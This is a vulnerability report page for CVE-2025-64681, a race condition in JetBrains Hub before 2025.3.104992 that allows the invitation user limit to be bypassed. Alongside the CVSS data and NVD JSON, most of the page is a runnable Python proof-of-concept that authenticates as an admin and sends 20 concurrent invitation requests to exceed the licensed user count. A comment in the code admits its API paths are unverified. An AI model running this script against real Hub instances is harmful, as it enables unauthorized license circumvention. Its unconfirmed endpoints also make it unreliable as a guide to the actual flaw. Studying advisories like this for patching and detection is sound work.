Security Vulnerability Report
CVE-2025-64681 CVSS 2.7 LOW

CVE-2025-64681

Published: 2025-11-10 14:15:43
Last Modified: 2025-11-20 19:54:04

Description

In JetBrains Hub before 2025.3.104992, a race condition allowed bypass of the user limit via invitations.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N (vendor/Secondary assessment; the NVD Primary assessment in the raw JSON below scores it 3.7 with CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N, i.e. no privileges required but high attack complexity; both map the weakness to CWE-862)

Configurations (Affected Products)

cpe:2.3:a:jetbrains:hub:*:*:*:*:*:*:*:* - VULNERABLE
JetBrains Hub < 2025.3.104992

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-64681 PoC - Race Condition in JetBrains Hub User Limit Bypass
# This PoC demonstrates the race condition vulnerability in JetBrains Hub
# Requires high-privilege account credentials
#
# NOTE(review): the REST paths below (/api/rest/users/login, /api/rest/invitations,
# /api/rest/users/count) and the token/cookie field names are as written in this
# PoC; the vendor advisory on this page does not document them, so treat them as
# unverified against a real Hub instance. The fix is to upgrade to Hub
# 2025.3.104992 or later.

import requests
import threading
import time
import sys

# Configuration
# Placeholder values; the script only works with a real Hub URL and an
# administrative account (the vendor CVSS vector is PR:H).
HUB_URL = "https://your-jetbrains-hub-instance.com"
USERNAME = "admin_username"
PASSWORD = "admin_password"
# Assumed licensed user limit of the target; verify_exploitation compares against it.
TARGET_USER_LIMIT = 10
# Number of invitation requests issued concurrently by exploit_race_condition.
CONCURRENT_REQUESTS = 20


class JetBrainsHubExploit:
    """Holds one authenticated requests.Session plus the tokens the other methods send."""

    def __init__(self) -> None:
        # One shared session: cookies set by login are reused by every later call,
        # and TLS verification stays at the requests default (enabled).
        self.session = requests.Session()
        self.token = None
        self.csrf_token = None

    def authenticate(self) -> bool:
        """Authenticate with JetBrains Hub and obtain session token.

        Returns True only on HTTP 200; any non-200 status or any exception
        (network error, non-JSON body) returns False after printing it.
        """
        auth_url = f"{HUB_URL}/api/rest/users/login"
        payload = {
            "username": USERNAME,
            "password": PASSWORD
        }
        try:
            response = self.session.post(auth_url, json=payload, timeout=30)
            if response.status_code == 200:
                # Both lookups use .get(), so a missing field leaves the
                # attribute as None rather than raising here.
                self.token = response.json().get('token')
                self.csrf_token = response.cookies.get('CSRF-TOKEN')
                print(f"[+] Authentication successful")
                return True
            else:
                print(f"[-] Authentication failed: {response.status_code}")
                return False
        except Exception as e:
            # Broad catch: a failed login is reported, never propagated.
            print(f"[-] Authentication error: {e}")
            return False

    def send_invitation(self, target_email: str, thread_id: int) -> bool:
        """Send a single invitation request - exploiting race condition.

        Runs once per worker thread. Returns True when the server answers
        200 or 201, False on any other status or on an exception.
        """
        invite_url = f"{HUB_URL}/api/rest/invitations"
        headers = {
            # If authenticate() found no token these headers carry "Bearer None"
            # and None; the request is still sent.
            "Authorization": f"Bearer {self.token}",
            "X-CSRF-TOKEN": self.csrf_token,
            "Content-Type": "application/json"
        }
        payload = {
            "email": target_email,
            "role": "user",
            "sendNotification": False
        }
        try:
            response = self.session.post(invite_url, json=payload, headers=headers, timeout=10)
            print(f"[Thread-{thread_id}] Invitation sent to {target_email}: Status {response.status_code}")
            return response.status_code == 200 or response.status_code == 201
        except Exception as e:
            print(f"[Thread-{thread_id}] Error: {e}")
            return False

    def exploit_race_condition(self) -> None:
        """Exploit the race condition to bypass user limit.

        Starts CONCURRENT_REQUESTS threads, each posting one invitation for a
        distinct example.com address, then joins them all. Return values of
        send_invitation are discarded; outcome is read from the printed statuses.

        Detection note: on the server side this shows up as a burst of
        near-simultaneous POSTs to the invitation endpoint from a single
        administrative session, followed by a user count above the licensed limit.
        """
        print(f"[*] Starting race condition exploit with {CONCURRENT_REQUESTS} threads")
        print(f"[*] Target user limit: {TARGET_USER_LIMIT}")
        threads = []
        for i in range(CONCURRENT_REQUESTS):
            target_email = f"attacker_user_{i}@example.com"
            thread = threading.Thread(target=self.send_invitation, args=(target_email, i))
            threads.append(thread)
        # Start all threads simultaneously to trigger race condition
        for thread in threads:
            thread.start()
        # Wait for all threads to complete
        for thread in threads:
            thread.join()
        print(f"[*] Exploit execution completed")
        print(f"[*] Check JetBrains Hub admin panel for created users")

    def verify_exploitation(self) -> bool:
        """Verify if user limit was bypassed.

        Returns True when the reported count exceeds TARGET_USER_LIMIT. A
        missing 'count' field defaults to 0, so a schema mismatch reads as
        "not vulnerable" rather than as an error. No timeout is passed on this
        GET, unlike the POSTs above.
        """
        users_url = f"{HUB_URL}/api/rest/users/count"
        headers = {"Authorization": f"Bearer {self.token}"}
        try:
            response = self.session.get(users_url, headers=headers)
            if response.status_code == 200:
                user_count = response.json().get('count', 0)
                print(f"[*] Current user count: {user_count}")
                if user_count > TARGET_USER_LIMIT:
                    print(f"[!] VULNERABLE: User limit bypassed! Count exceeds {TARGET_USER_LIMIT}")
                    return True
                else:
                    print(f"[-] User count within limit or patch applied")
            return False
        except Exception as e:
            print(f"[-] Verification error: {e}")
            return False


def main() -> None:
    """Entry point: `--verify` only reads the user count; otherwise run the PoC then verify."""
    if len(sys.argv) > 1 and sys.argv[1] == '--verify':
        print("[*] Verification mode - checking if target is vulnerable")
        exploit = JetBrainsHubExploit()
        if exploit.authenticate():
            exploit.verify_exploitation()
    else:
        print("[*] CVE-2025-64681 - JetBrains Hub Race Condition Exploit")
        print("[*] WARNING: This is for authorized security testing only")
        exploit = JetBrainsHubExploit()
        if exploit.authenticate():
            exploit.exploit_race_condition()
            # Fixed delay before re-reading the count; not synchronised with
            # anything server-side.
            time.sleep(2)
            exploit.verify_exploitation()


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64681", "sourceIdentifier": "[email protected]", "published": "2025-11-10T14:15:43.450", "lastModified": "2025-11-20T19:54:04.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains Hub before 2025.3.104992 a race condition allowed bypass of the user limit via invitations"}, {"lang": "es", "value": "En JetBrains Hub antes de 2025.3.104992, una condición de carrera permitió eludir el límite de usuarios a través de invitaciones."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:hub:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.3.104992", "matchCriteriaId": "9F5AE1DF-DF89-45D2-BD7B-DF79E3D165BC"}]}]}], "references": [{"url": 
"https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}